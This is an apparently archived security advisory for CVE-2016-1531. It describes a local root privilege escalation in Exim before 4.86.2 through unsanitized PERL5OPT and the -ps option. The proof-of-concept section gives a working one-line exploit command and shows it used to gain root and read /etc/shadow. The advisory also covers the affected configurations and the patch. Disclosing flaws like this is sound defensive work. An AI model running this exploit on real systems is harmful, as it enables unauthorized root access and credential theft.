Twenty Year Anniversary

Exim Local Privilege Escalation

Exim Local Privilege Escalation
Posted Mar 10, 2016
Authored by Dawid Golunski

Exim versions prior to 4.86.2 suffer from a local root privilege escalation vulnerability. When Exim installation has been compiled with Perl support and contains a perl_startup configuration variable it can be exploited by malicious local attackers to gain root privileges.

tags | exploit, local, root, perl
advisories | CVE-2016-1531
MD5 | dfa8bd2eefce417043294f1a91f32077

Exim Local Privilege Escalation

Change Mirror Download
=============================================
- Advisory release date: 10.03.2016
- Created by: Dawid Golunski
- Severity: High/Critical
=============================================


I. VULNERABILITY
-------------------------

Exim < 4.86.2 Local Root Privilege Escalation Exploit


II. BACKGROUND
-------------------------

"Exim is a message transfer agent (MTA) developed at the University of
Cambridge for use on Unix systems connected to the Internet. It is freely
available under the terms of the GNU General Public Licence. In style it is
similar to Smail 3, but its facilities are more general. There is a great
deal of flexibility in the way mail can be routed, and there are extensive
facilities for checking incoming mail. Exim can be installed in place of
Sendmail, although the configuration of Exim is quite different."

http://www.exim.org/


III. INTRODUCTION
-------------------------

When Exim installation has been compiled with Perl support and contains a
perl_startup configuration variable it can be exploited by malicious local
attackers to gain root privileges.

IV. DESCRIPTION
-------------------------

The vulnerability stems from Exim in versions below 4.86.2 not performing
sanitization of the environment before loading a perl script defined
with perl_startup setting in exim config.

perl_startup is usually used to load various helper scripts such as
mail filters, gray listing scripts, mail virus scanners etc.

For the option to be supported, exim must have been compiled with Perl
support, which can be verified with:

[dawid@centos7 ~]$ exim -bV -v | grep i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL
Content_Scanning DKIM Old_Demime PRDR OCSP


To perform the attack, attacker can take advantage of the exim's sendmail
interface which links to an exim binary that has an SUID bit set on it by
default as we can see below:

[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim
lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim

[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim


Normally, when exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e entering mail contents for
sending etc), however an attacker can make use of the following command line
parameter which is available to all users:

-ps This option applies when an embedded Perl interpreter is linked with
Exim. It overrides the setting of the perl_at_start option, forcing the
starting of the interpreter to occur as soon as Exim is started.


As we can see from the documentation at:

http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html

the perl_at_start option does the following:

"Setting perl_at_start (a boolean option) in the configuration requests a
startup when Exim is entered."

Therefore it is possible to force the execution of the perl_startup script
defined in the Exim's main config before exim drops its root privileges.


To exploit this setting and gain the effective root privilege of the SUID binary,
attackers can inject PERL5OPT perl environment variable, which does not get
cleaned by affected versions of Exim.

As per perl documentation, the environment variable allows to set perl command-line
options (switches). Switches in this variable are treated as if they were on every
Perl command line.

There are several interesting perl switches that that could be set by attackers to
trigger code execution.
One of these is -d switch which forces perl to enter an interactive debug mode
in which it is possible to take control of the perl application.

An example proof of concept exploit using the -d switch can be found below.


V. PROOF OF CONCEPT ROOT EXPLOIT
-------------------------

[dawid@centos7 ~]$ head /etc/exim/exim.conf
######################################################################
# Runtime configuration file for Exim #
######################################################################

# Custom filtering via perl
perl_startup = do '/usr/share/exim4/exigrey.pl'

[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP

[dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.37
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated. Use q to quit or R to restart,
use o inhibit_exit to avoid stopping after program termination,
h q, h R or h o to get additional info.

DB<1> p system("id");
uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
0
DB<2> p system("head /etc/shadow");
root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7::
[...]


VI. BUSINESS IMPACT
-------------------------

This vulnerability could be exploited by attackers who have local access to the
system to escalate their privileges to root which would allow them to fully
compromise the system.

VII. SYSTEMS AFFECTED
-------------------------

Exim versions before the latest patched version of Exim 4.86.2 are affected by
this vulnerability, if Exim was compiled with Perl support and the main
configuration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains
a perl_startup option e.g:

perl_startup = do '/usr/share/exim4/exigrey.pl'

It is important to note that the file does not necessarily have to exist
to exploit the vulnerability. Although the path must be specified.


VIII. SOLUTION
-------------------------

Update to Exim 4.86.2 which contains the official patch that fixes the
environment sanitization issues.

IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt
http://www.exim.org/
http://www.exim.org/static/doc/CVE-2016-1531.txt
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f

CVE-2016-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531

X. ADVISORY CREATED BY
-------------------------

This advisory has been created by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XI. REVISION HISTORY
-------------------------

March 10th, 2016: Advisory released
March 11th, 2016: Fixed advisory header,added cve.mitre link of the root issue

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    2 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close